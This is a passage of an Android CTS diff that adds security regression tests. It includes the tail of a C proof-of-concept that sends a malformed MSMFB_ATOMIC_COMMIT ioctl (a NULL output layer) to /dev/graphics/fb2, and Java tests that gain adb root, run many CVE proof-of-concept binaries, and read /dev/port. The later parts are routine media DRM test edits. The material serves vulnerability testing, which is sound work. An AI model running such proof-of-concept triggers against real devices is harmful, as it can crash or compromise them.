+#define MSMFB_ATOMIC_COMMIT _IOWR(MDP_IOCTL_MAGIC, 128, void *)
+
+#define MDP_COMMIT_VERSION_1_0 0x00010000
+#define MDP_VALIDATE_LAYER 0x01
+
+#ifdef __LP64
+#define MDP_LAYER_COMMIT_V1_PAD 3
+#else
+#define MDP_LAYER_COMMIT_V1_PAD 4
+#endif
+
+#define MAX_PLANES 4
+
+struct mult_factor {
+ uint32_t numer;
+ uint32_t denom;
+};
+
+enum mdp_color_space {
+ MDP_CSC_ITU_R_601,
+ MDP_CSC_ITU_R_601_FR,
+ MDP_CSC_ITU_R_709,
+};
+
+enum mdss_mdp_blend_op {
+ BLEND_OP_NOT_DEFINED = 0,
+ BLEND_OP_OPAQUE,
+ BLEND_OP_PREMULTIPLIED,
+ BLEND_OP_COVERAGE,
+ BLEND_OP_MAX,
+};
+
+struct mdp_rect {
+ uint32_t x;
+ uint32_t y;
+ uint32_t w;
+ uint32_t h;
+};
+
+struct mdp_layer_plane {
+ int fd;
+ uint32_t offset;
+ uint32_t stride;
+};
+
+struct mdp_layer_commit_v1 {
+ uint32_t flags;
+ int release_fence;
+ struct mdp_rect left_roi;
+ struct mdp_rect right_roi;
+ struct mdp_input_layer __user *input_layers;
+ uint32_t input_layer_cnt;
+ struct mdp_output_layer __user *output_layer;
+ int retire_fence;
+ void __user *dest_scaler;
+ uint32_t dest_scaler_cnt;
+ uint32_t reserved[MDP_LAYER_COMMIT_V1_PAD];
+};
+
+struct mdp_layer_commit {
+ uint32_t version;
+ union {
+ struct mdp_layer_commit_v1 commit_v1;
+ };
+};
+
+struct mdp_layer_buffer {
+ uint32_t width;
+ uint32_t height;
+ uint32_t format;
+ struct mdp_layer_plane planes[MAX_PLANES];
+ uint32_t plane_count;
+ struct mult_factor comp_ratio;
+ int fence;
+ uint32_t reserved;
+};
+
+struct mdp_output_layer {
+ uint32_t flags;
+ uint32_t writeback_ndx;
+ struct mdp_layer_buffer buffer;
+ enum mdp_color_space color_space;
+ uint32_t reserved[5];
+};
+
+struct mdp_input_layer {
+ uint32_t flags;
+ uint32_t pipe_ndx;
+ uint8_t horz_deci;
+ uint8_t vert_deci;
+ uint8_t alpha;
+ uint16_t z_order;
+ uint32_t transp_mask;
+ uint32_t bg_color;
+ enum mdss_mdp_blend_op blend_op;
+ enum mdp_color_space color_space;
+ struct mdp_rect src_rect;
+ struct mdp_rect dst_rect;
+ void __user *scale;
+ struct mdp_layer_buffer buffer;
+ void __user *pp_info;
+ int error_code;
+ uint32_t reserved[6];
+};
+
+int main() {
+ int fd;
+ struct mdp_layer_commit commit;
+ struct mdp_output_layer output_layer;
+
+ fd = open("/dev/graphics/fb2", O_RDWR, 0);
+ if (fd < 0) {
+ return -1;
+ }
+
+ memset(&commit, 0, sizeof(struct mdp_layer_commit));
+ commit.version = MDP_COMMIT_VERSION_1_0;
+
+ memset(&output_layer, 0, sizeof(output_layer));
+ commit.commit_v1.output_layer = (struct mdp_output_layer *)NULL;
+ commit.commit_v1.flags |= MDP_VALIDATE_LAYER;
+ ioctl(fd, MSMFB_ATOMIC_COMMIT, &commit);
+
+ return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index f6a6f61..7670e61 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -16,6 +16,7 @@
package android.security.cts;
+import com.android.ddmlib.NullOutputReceiver;
import com.android.tradefed.device.CollectingOutputReceiver;
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
@@ -60,7 +61,7 @@
/**
* Pushes and runs a binary to the selected device
*
- * @param pathToPoc a string path to poc from the /res folder
+ * @param pocName a string path to poc from the /res folder
* @param device device to be ran on
* @param timeout time to wait for output in seconds
* @return the console output from the binary
@@ -74,6 +75,21 @@
}
/**
+ * Pushes and runs a binary to the selected device and ignores any of its output.
+ *
+ * @param pocName a string path to poc from the /res folder
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ */
+ public static void runPocNoOutput(String pocName, ITestDevice device, int timeout)
+ throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ NullOutputReceiver receiver = new NullOutputReceiver();
+ device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout,
+ TimeUnit.SECONDS, 0);
+ }
+
+ /**
* Pushes and installs an apk to the selected device
*
* @param pathToApk a string path to apk from the /res folder
@@ -121,7 +137,8 @@
* @return boolean returns false if the test fails, otherwise returns true
**/
public static boolean detectInformationDisclosure(
- String pocName, ITestDevice device, int timeout, String pattern) throws Exception {
+ String pocName, ITestDevice device, int timeout,
+ String pattern) throws Exception {
String pocOutput = runPoc(pocName, device, timeout);
if (Pattern.matches(pattern, pocOutput))
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_12.java b/hostsidetests/security/src/android/security/cts/Poc16_12.java
index a6160d5..7e24e8f 100644
--- a/hostsidetests/security/src/android/security/cts/Poc16_12.java
+++ b/hostsidetests/security/src/android/security/cts/Poc16_12.java
@@ -133,7 +133,8 @@
@SecurityTest
public void testPocCVE_2016_8434() throws Exception {
if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
- AdbUtils.runPoc("CVE-2016-8434", getDevice(), 60);
+ // This poc is very verbose so we ignore the output to avoid using a lot of memory.
+ AdbUtils.runPocNoOutput("CVE-2016-8434", getDevice(), 60);
}
}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_02.java b/hostsidetests/security/src/android/security/cts/Poc17_02.java
new file mode 100644
index 0000000..4f22f3b
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_02.java
@@ -0,0 +1,34 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_02 extends SecurityTestCase {
+
+ /**
+ * b/31796345
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0451() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/voice_svc")) {
+ AdbUtils.runPoc("CVE-2017-0451", getDevice(), 60);
+ }
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_04.java b/hostsidetests/security/src/android/security/cts/Poc17_04.java
new file mode 100644
index 0000000..e89a45a
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_04.java
@@ -0,0 +1,99 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+public class Poc17_04 extends SecurityTestCase {
+
+ /**
+ * b/33544431
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0576() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/qce")) {
+ AdbUtils.runPoc("CVE-2017-0576", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/34325986
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0580() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/touch_fwu")) {
+ AdbUtils.runPoc("CVE-2017-0580", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/33353601
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0462() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/seemplog")) {
+ AdbUtils.runPoc("CVE-2017-0462", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/33842951
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0577() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/touch_fwu")) {
+ AdbUtils.runPoc("CVE-2017-0577", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/33966912
+ */
+ @SecurityTest
+ public void testPocCVE_2016_10231() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/snd/controlC0")) {
+ AdbUtils.runPoc("CVE-2016-10231", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/34276203
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0564() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/ion")) {
+ AdbUtils.runPocNoOutput("CVE-2017-0564", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/33649808
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0586() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/snd/controlC0")) {
+ AdbUtils.runPoc("CVE-2017-0586", getDevice(), 60);
+ }
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_06.java b/hostsidetests/security/src/android/security/cts/Poc17_06.java
new file mode 100644
index 0000000..27c787e
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_06.java
@@ -0,0 +1,105 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_06 extends SecurityTestCase {
+
+ /**
+ * b/34328139
+ */
+ @SecurityTest
+ public void testPocBug_34328139() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/mdss_rotator")) {
+ AdbUtils.runPoc("Bug-34328139", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/33452365
+ */
+ @SecurityTest
+ public void testPocBug_33452365() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/snd/pcmC0D16c")) {
+ AdbUtils.runPoc("Bug-33452365", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/34125463
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0579() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/graphics/fb0")) {
+ AdbUtils.runPoc("CVE-2017-0579", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/33751424
+ */
+ @SecurityTest
+ public void testPocCVE_2017_7369() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/snd/controlC0")) {
+ AdbUtils.runPoc("CVE-2017-7369", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/35047780
+ */
+ @SecurityTest
+ public void testPocBug_35047780() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("Bug-35047780", getDevice(), 60);
+ }
+
+ /**
+ * b/35048450
+ */
+ @SecurityTest
+ public void testPocBug_35048450() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("Bug-35048450", getDevice(), 60);
+ }
+
+ /**
+ * b/35047217
+ */
+ @SecurityTest
+ public void testPocBug_35047217() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("Bug-35047217", getDevice(), 60);
+ }
+
+ /**
+ * b/35644815
+ */
+ @SecurityTest
+ public void testPocBug_35644815() throws Exception {
+ enableAdbRoot(getDevice());
+ infoDisclosure("Bug-35644815", getDevice(), 60,
+ "[\\s\\n\\S]*INFO DISC FLAG: 0000[\\s\\n\\S]*", false);
+ }
+
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_07.java b/hostsidetests/security/src/android/security/cts/Poc17_07.java
new file mode 100644
index 0000000..01c4bf8
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_07.java
@@ -0,0 +1,87 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_07 extends SecurityTestCase {
+
+ /**
+ * b/33863407
+ */
+ @SecurityTest
+ public void testPocBug_33863407() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/sys/kernel/debug/mdp/reg")) {
+ AdbUtils.runPoc("Bug-33863407", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/36604779
+ */
+ @SecurityTest
+ public void testPocBug_36604779() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/port")) {
+ AdbUtils.runCommandLine("cat /dev/port", getDevice());
+ }
+ }
+
+ /**
+ * b/34973477
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0705() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/proc/net/psched")) {
+ AdbUtils.runPoc("CVE-2017-0705", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/34126808
+ */
+ @SecurityTest
+ public void testPocCVE_2017_8263() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/ashmem")) {
+ AdbUtils.runPoc("CVE-2017-8263", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/34173755
+ */
+ @SecurityTest
+ public void testPocBug_34173755() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/ashmem")) {
+ AdbUtils.runPoc("Bug-34173755", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/35950388
+ */
+ @SecurityTest
+ public void testPocBug_35950388() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPocNoOutput("Bug-35950388", getDevice(), 60);
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_08.java b/hostsidetests/security/src/android/security/cts/Poc17_08.java
new file mode 100644
index 0000000..1d993bb
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_08.java
@@ -0,0 +1,65 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_08 extends SecurityTestCase {
+
+ /**
+ * b/36266767
+ */
+ @SecurityTest
+ public void testPocBug_36266767() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("Bug-36266767", getDevice(), 60);
+ }
+
+ /**
+ * b/36591162
+ */
+ @SecurityTest
+ public void testPocBug_36591162() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/qce")) {
+ AdbUtils.runPoc("Bug-36591162", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/35258962
+ */
+ @SecurityTest
+ public void testPocCVE_2017_9678() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/graphics/fb0")) {
+ AdbUtils.runPoc("CVE-2017-9678", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/36731152
+ */
+ @SecurityTest
+ public void testPocCVE_2017_9692() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/graphics/fb2")) {
+ AdbUtils.runPoc("CVE-2017-9692", getDevice(), 60);
+ }
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
index b3144e1..0f9da40 100644
--- a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
@@ -93,9 +93,11 @@
* Runs an info disclosure
**/
public void infoDisclosure(
- String pocName, ITestDevice device, int timeout, String pattern ) throws Exception {
+ String pocName, ITestDevice device, int timeout,
+ String pattern, boolean result) throws Exception {
- assertTrue("Pattern found. Info Disclosed.",
- AdbUtils.detectInformationDisclosure(pocName, device, timeout, pattern));
+ assertTrue("Pattern found.",
+ AdbUtils.detectInformationDisclosure
+ (pocName, device, timeout, pattern)==result );
}
}
diff --git a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerPinnedStackTests.java b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerPinnedStackTests.java
index 7a691ec..b99a748 100644
--- a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerPinnedStackTests.java
+++ b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerPinnedStackTests.java
@@ -34,6 +34,8 @@
pinnedStackTester(PIP_ACTIVITY, PIP_ACTIVITY, true, false);
}
+ /**
+ * Disabled for b/35314835
public void testAlwaysFocusablePipActivity() throws Exception {
pinnedStackTester(ALWAYS_FOCUSABLE_PIP_ACTIVITY, ALWAYS_FOCUSABLE_PIP_ACTIVITY, true, true);
}
@@ -42,6 +44,7 @@
pinnedStackTester(
LAUNCH_INTO_PINNED_STACK_PIP_ACTIVITY, ALWAYS_FOCUSABLE_PIP_ACTIVITY, false, true);
}
+ */
private void pinnedStackTester(String startActivity, String topActivityName,
boolean moveTopToPinnedStack, boolean isFocusable) throws Exception {
diff --git a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
index fa1ae69..77119c0 100644
--- a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
+++ b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
@@ -19,10 +19,12 @@
import com.android.tradefed.device.CollectingOutputReceiver;
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.log.LogUtil.CLog;
import com.android.tradefed.testtype.DeviceTestCase;
import java.util.HashMap;
import java.util.Map;
+import java.util.regex.Pattern;
public class CrossAppDragAndDropTests extends DeviceTestCase {
// Constants copied from ActivityManager.StackId. If they are changed there, these must be
@@ -47,13 +49,17 @@
private static final String INPUT_MOUSE_SWIPE = "input mouse swipe ";
private static final String TASK_ID_PREFIX = "taskId";
+ // Regex pattern to match adb shell am stack list output of the form:
+ // taskId=<TASK_ID>: <componentName> bounds=[LEFT,TOP][RIGHT,BOTTOM]
+ private static final String TASK_REGEX_PATTERN_STRING =
+ "taskId=[0-9]+: %s bounds=\\[[0-9]+,[0-9]+\\]\\[[0-9]+,[0-9]+\\]";
+
private static final int SWIPE_DURATION_MS = 500;
private static final String SOURCE_PACKAGE_NAME = "android.wm.cts.dndsourceapp";
private static final String TARGET_PACKAGE_NAME = "android.wm.cts.dndtargetapp";
private static final String TARGET_23_PACKAGE_NAME = "android.wm.cts.dndtargetappsdk23";
-
private static final String SOURCE_ACTIVITY_NAME = "DragSource";
private static final String TARGET_ACTIVITY_NAME = "DropTarget";
@@ -218,8 +224,15 @@
CollectingOutputReceiver outputReceiver = new CollectingOutputReceiver();
mDevice.executeShellCommand(AM_STACK_LIST, outputReceiver);
final String output = outputReceiver.getOutput();
+ final StringBuilder builder = new StringBuilder();
+ builder.append("Finding task info for task: ");
+ builder.append(name);
+ builder.append("\nParsing adb shell am output: " );
+ builder.append(output);
+ CLog.i(builder.toString());
+ final Pattern pattern = Pattern.compile(String.format(TASK_REGEX_PATTERN_STRING, name));
for (String line : output.split("\\n")) {
- if (line.contains(name)) {
+ if (pattern.matcher(line).find()) {
return line;
}
}
diff --git a/tests/tests/media/Android.mk b/tests/tests/media/Android.mk
index 66dcef6..47e8ae1 100644
--- a/tests/tests/media/Android.mk
+++ b/tests/tests/media/Android.mk
@@ -44,9 +44,11 @@
# include both the 32 and 64 bit versions
LOCAL_MULTILIB := both
-LOCAL_STATIC_JAVA_LIBRARIES := ctsmediautil ctsdeviceutil compatibility-device-util ctstestserver ctstestrunner ndkaudio
+LOCAL_STATIC_JAVA_LIBRARIES := ctsmediautil ctsdeviceutil compatibility-device-util
+LOCAL_STATIC_JAVA_LIBRARIES += ctstestserver ctstestrunner ndkaudio
-LOCAL_JNI_SHARED_LIBRARIES := libctsmediadrm_jni libctsmediacodec_jni libaudio_jni libnativehelper_compat_libc++ libndkaudioLib
+LOCAL_JNI_SHARED_LIBRARIES := libctsmediacodec_jni libaudio_jni libnativehelper_compat_libc++
+LOCAL_JNI_SHARED_LIBRARIES += libndkaudioLib libctsmediadrm_jni
# do not compress VP9 video files
LOCAL_AAPT_FLAGS := -0 .vp9
diff --git a/tests/tests/media/libmediandkjni/Android.mk b/tests/tests/media/libmediandkjni/Android.mk
index 5aa222a..1ccdede 100644
--- a/tests/tests/media/libmediandkjni/Android.mk
+++ b/tests/tests/media/libmediandkjni/Android.mk
@@ -19,7 +19,7 @@
#
include $(CLEAR_VARS)
-LOCAL_MODULE := libctsmediacodec_jni
+LOCAL_MODULE := libctsmediacodec_jni
LOCAL_MODULE_TAGS := optional
@@ -36,11 +36,11 @@
LOCAL_SHARED_LIBRARIES := \
libandroid libnativehelper_compat_libc++ \
- liblog libmediandk libEGL
+ liblog libmediandk
-LOCAL_SDK_VERSION := 24
+LOCAL_SDK_VERSION := 23
-LOCAL_CFLAGS := -Werror -Wall -DEGL_EGLEXT_PROTOTYPES -std=gnu++14
+LOCAL_CFLAGS := -Werror -Wall
include $(BUILD_SHARED_LIBRARY)
@@ -49,7 +49,7 @@
#
include $(CLEAR_VARS)
-LOCAL_MODULE := libctsmediadrm_jni
+LOCAL_MODULE := libctsmediadrm_jni
# Don't include this package in any configuration by default.
LOCAL_MODULE_TAGS := optional
@@ -64,16 +64,17 @@
$(JNI_H_INCLUDE) \
system/core/include
+
LOCAL_C_INCLUDES += $(call include-path-for, mediandk)
LOCAL_SHARED_LIBRARIES := \
libandroid libnativehelper_compat_libc++ \
- liblog libmediandk libdl libEGL
+ liblog libmediandk libdl
-LOCAL_SDK_VERSION := 24
-
-LOCAL_CFLAGS := -Werror -Wall -DEGL_EGLEXT_PROTOTYPES
+LOCAL_SDK_VERSION := 23
LOCAL_NDK_STL_VARIANT := c++_static
+LOCAL_CFLAGS := -Werror -Wall
+
include $(BUILD_SHARED_LIBRARY)
diff --git a/tests/tests/media/libmediandkjni/md5_utils.cpp b/tests/tests/media/libmediandkjni/md5_utils.cpp
index 7850cac..8e520e1 100644
--- a/tests/tests/media/libmediandkjni/md5_utils.cpp
+++ b/tests/tests/media/libmediandkjni/md5_utils.cpp
@@ -157,7 +157,7 @@
*/
void
MD5Transform(UWORD32 buf[4], UWORD32 const in[16]) {
- /*register*/ UWORD32 a, b, c, d;
+ UWORD32 a, b, c, d;
a = buf[0];
b = buf[1];
diff --git a/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp b/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp
index 571cec4..b98a6af 100644
--- a/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp
+++ b/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp
@@ -59,9 +59,9 @@
static const size_t kPlayTimeSeconds = 30;
static const size_t kUuidSize = 16;
-static const uint8_t kClearKeyUuid[kUuidSize] = {
- 0x10, 0x77, 0xef, 0xec, 0xc0, 0xb2, 0x4d, 0x02,
- 0xac, 0xe3, 0x3c, 0x1e, 0x52, 0xe2, 0xfb, 0x4b
+static const uint8_t kWidevineUuid[kUuidSize] = {
+ 0xed, 0xef, 0x8b, 0xa9, 0x79, 0xd6, 0x4a, 0xce,
+ 0xa3, 0xc8, 0x27, 0xdc, 0xd5, 0x1d, 0x21, 0xed
};
// The test content is not packaged with clearkey UUID,
@@ -77,8 +77,8 @@
// number of key ids
0x00, 0x00, 0x00, 0x01,
// key id
- 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30,
- 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30,
+ 0x60, 0x06, 0x1e, 0x01, 0x7e, 0x47, 0x7e, 0x87,
+ 0x7e, 0x57, 0xd0, 0x0d, 0x1e, 0xd0, 0x0d, 0x1e,
// size of data, must be zero
0x00, 0x00, 0x00, 0x00
};
@@ -86,23 +86,23 @@
static const uint8_t kKeyRequestData[] = {
0x7b, 0x22, 0x6b, 0x69, 0x64,
0x73, 0x22, 0x3a, 0x5b, 0x22,
- 0x4d, 0x44, 0x41, 0x77, 0x4d,
- 0x44, 0x41, 0x77, 0x4d, 0x44,
- 0x41, 0x77, 0x4d, 0x44, 0x41,
- 0x77, 0x4d, 0x44, 0x41, 0x77,
- 0x4d, 0x41, 0x22, 0x5d, 0x2c,
+ 0x59, 0x41, 0x59, 0x65, 0x41,
+ 0x58, 0x35, 0x48, 0x66, 0x6f,
+ 0x64, 0x2b, 0x56, 0x39, 0x41,
+ 0x4e, 0x48, 0x74, 0x41, 0x4e,
+ 0x48, 0x67, 0x22, 0x5d, 0x2c,
0x22, 0x74, 0x79, 0x70, 0x65,
0x22, 0x3a, 0x22, 0x74, 0x65,
0x6d, 0x70, 0x6f, 0x72, 0x61,
- 0x72, 0x79, 0x22, 0x7d
+ 0x72, 0x79, 0x22, 0x7d,
};
static const size_t kKeyRequestSize = sizeof(kKeyRequestData);
// base 64 encoded JSON response string, must not contain padding character '='
static const char kResponse[] = "{\"keys\":[{\"kty\":\"oct\"," \
- "\"kid\":\"MDAwMDAwMDAwMDAwMDAwMA\",\"k\":" \
- "\"Pwoz80CYueIrwHjgobXoVA\"}]}";
+ "\"kid\":\"YAYeAX5Hfod+V9ANHtANHg\",\"k\":" \
+ "\"GoogleTestKeyBase64ggg\"}]}";
static bool isUuidSizeValid(Uuid uuid) {
return (uuid.size() == kUuidSize);
@@ -246,12 +246,17 @@
for (size_t i = 0; i < psshInfo->numentries; i++) {
PsshEntry *entry = &psshInfo->entries[i];
- if (0 == memcmp(entry->uuid, kClearKeyUuid, sizeof(entry->uuid))) {
- aMediaObjects.setDrm(AMediaDrm_createByUUID(&juuid[0]));
- if (aMediaObjects.getDrm()) {
+ // We do not have clearkey content that contains ClearKey UUID in the
+ // pssh box. So we have to test if it has Widevine UUID instead.
+ // TODO: Replace kWidevineUuid with uuid when test content contains
+ // ClearKey UUID.
+ if (0 == memcmp(entry->uuid, kWidevineUuid, sizeof(entry->uuid))) {
+ aMediaObjects.setCrypto(
+ AMediaCrypto_new(entry->uuid, entry->data, entry->datalen));
+ if (aMediaObjects.getCrypto()) {
testResult = JNI_TRUE;
} else {
- ALOGE("Failed to create media drm=%zd", i);
+ ALOGE("Failed to create media crypto=%zd", i);
testResult = JNI_FALSE;
}
break;
@@ -288,7 +293,6 @@
AMediaCodec** codec) {
size_t numTracks = AMediaExtractor_getTrackCount(
const_cast<AMediaExtractor*>(extractor));
-
AMediaFormat* trackFormat = NULL;
for (size_t i = 0; i < numTracks; ++i) {
trackFormat = AMediaExtractor_getTrackFormat(
@@ -301,7 +305,6 @@
if (!AMediaFormat_getString(
trackFormat, AMEDIAFORMAT_KEY_MIME, &mime)) {
ALOGE("no mime type");
-
AMediaFormat_delete(trackFormat);
return;
} else if (isAudio(mime) || isVideo(mime)) {
@@ -347,7 +350,6 @@
AMediaCodecCryptoInfo *cryptoInfo =
AMediaExtractor_getSampleCryptoInfo(extractor);
-
if (cryptoInfo) {
status = AMediaCodec_queueSecureInputBuffer(
codec, bufferIndex, 0, cryptoInfo,
@@ -418,7 +420,6 @@
}
addTracks(audioExtractor, NULL, NULL, &audioCodec);
-
addTracks(videoExtractor, crypto, window, &videoCodec);
bool sawAudioInputEos = false;
@@ -614,7 +615,7 @@
int count = 0;
while (!gGotVendorDefinedEvent && count++ < 5) {
// Prevents race condition when the event arrives late
- usleep(2000);
+ usleep(1000);
}
if (!gGotVendorDefinedEvent) {
ALOGE("Event listener did not receive the expected event.");
diff --git a/tests/tests/media/src/android/media/cts/ConnectionStatus.java b/tests/tests/media/src/android/media/cts/ConnectionStatus.java
index 407e553..37fc75e 100644
--- a/tests/tests/media/src/android/media/cts/ConnectionStatus.java
+++ b/tests/tests/media/src/android/media/cts/ConnectionStatus.java
@@ -132,14 +132,6 @@
}
public void testConnection(Uri uri) {
